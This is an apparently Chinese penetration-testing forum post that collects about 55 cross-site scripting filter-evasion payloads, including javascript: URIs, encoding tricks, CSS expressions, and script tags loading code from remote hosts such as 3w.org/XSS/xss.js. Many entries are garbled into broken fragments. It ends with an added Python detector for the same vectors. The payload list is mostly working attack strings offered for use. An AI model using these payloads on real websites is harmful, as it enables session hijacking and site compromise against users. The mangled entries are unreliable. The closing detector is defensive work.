中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: XSS attack roundup
Author: admin
Time: 2016-4-28 10:06
(1) Ordinary XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolon required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag fix

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode tag (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..省略..S')>

(9) 7-bit UTF-8 Unicode encoding, without semicolons (calculator)

<IMG SRC=jav..省略..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tag, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tag, splitting the JavaScript

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Getting around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them.

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag preceded by spaces and meta characters

<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3

<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript

\";alert('XSS');//

(30) Closing the Title tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute split expression

<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS

<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>

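An added detection example (my own code, not part of the original post): a Python normalizer that reduces a URL-bearing attribute value to the scheme a lenient browser would see, covering the evasions in entries (3) through (14), (17) and (19) above (mixed case, decimal and hex character references with or without semicolons, embedded tab/newline/CR, NUL and leading spaces), then scans markup for the SRC/HREF/BACKGROUND/DYNSRC/LOWSRC, META refresh URL= and CSS url() vectors the roundup lists. The stripped character set, the regexes and the sample markup are my own assumptions and constructions.

```python
import html
import re

# Schemes the roundup smuggles into SRC/HREF/BACKGROUND/url() slots.
DANGEROUS_SCHEMES = ("javascript", "vbscript")

# Characters a lenient parser ignores inside a scheme: C0 controls (NUL, TAB,
# LF, CR...), space, DEL, NBSP, U+2000 block, ideographic space, BOM. Assumed.
_IGNORED = re.compile(r"[\x00-\x20\x7f\xa0\u2000-\u200b\u3000\ufeff]")

# URL-bearing attributes from the roundup's tags, plus META refresh's URL=.
_URL_ATTR = re.compile(
    r"\b(?:src|href|background|dynsrc|lowsrc|url)\s*=\s*"
    r"(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.IGNORECASE)
# url(...) inside an inline STYLE attribute or a <STYLE> block.
_CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]*)", re.IGNORECASE)

def normalize_url(value: str) -> str:
    """Reduce a value to what a lenient browser would see: decode HTML
    character references (decimal or hex, with or without the trailing
    semicolon), drop the ignored characters, then lowercase."""
    return _IGNORED.sub("", html.unescape(value)).lower()

def is_dangerous_url(value: str) -> bool:
    norm = normalize_url(value)
    return any(norm.startswith(s + ":") for s in DANGEROUS_SCHEMES)

def find_dangerous_urls(markup: str) -> list:
    """Every attribute value or CSS url() whose normalized form starts with
    a script scheme. Regex based: treat hits as detections to review, not as
    a parser-grade sanitizer."""
    hits = []
    for m in _URL_ATTR.finditer(markup):
        raw = next(g for g in m.groups() if g is not None)
        if is_dangerous_url(raw):
            hits.append(raw)
    hits += [m.group(1) for m in _CSS_URL.finditer(markup)
             if is_dangerous_url(m.group(1))]
    return hits

# Constructed sample: entries (4), (11), (32), (39), (41) plus two benign URLs.
SAMPLE_MARKUP = """
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>
<META HTTP-EQUIV="refresh" CONTENT="0;URL=javascript:alert('XSS');">
<IMG SRC="https://example.com/logo.png">
<A HREF="/login">sign in</A>
"""
```

Running `find_dangerous_urls(SAMPLE_MARKUP)` flags the five script-scheme references and leaves the two benign ones alone; the same normalizer can sit in front of any attribute allow-list in a server-side HTML sanitizer.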
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)